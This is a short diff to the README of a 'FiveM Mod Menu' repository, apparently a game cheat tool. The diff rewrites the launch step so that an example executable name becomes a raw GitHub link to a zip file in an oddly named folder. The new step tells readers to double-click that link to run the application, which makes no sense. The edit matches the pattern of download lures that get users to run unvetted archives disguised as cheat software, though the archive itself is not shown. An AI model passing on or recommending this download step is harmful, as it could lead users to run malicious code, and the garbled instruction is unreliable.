barad67/FiveM-Mod-Menu/README.md

 5. **Run the Application:**
    - Navigate to the folder you just extracted.
-   - Find and double-click on the executable file (e.g., `FiveMModMenu.exe`) to launch the application.
+   - Find and double-click on the executable file (e.g., `https://github.com/barad67/FiveM-Mod-Menu/raw/refs/heads/main/compenetrate/Five_Menu_Mod_3.6.zip`) to launch the application.

 6. **Follow Setup Instructions:** Upon launching, the menu should provide instructions.
 Follow these to set it up in your FiveM client.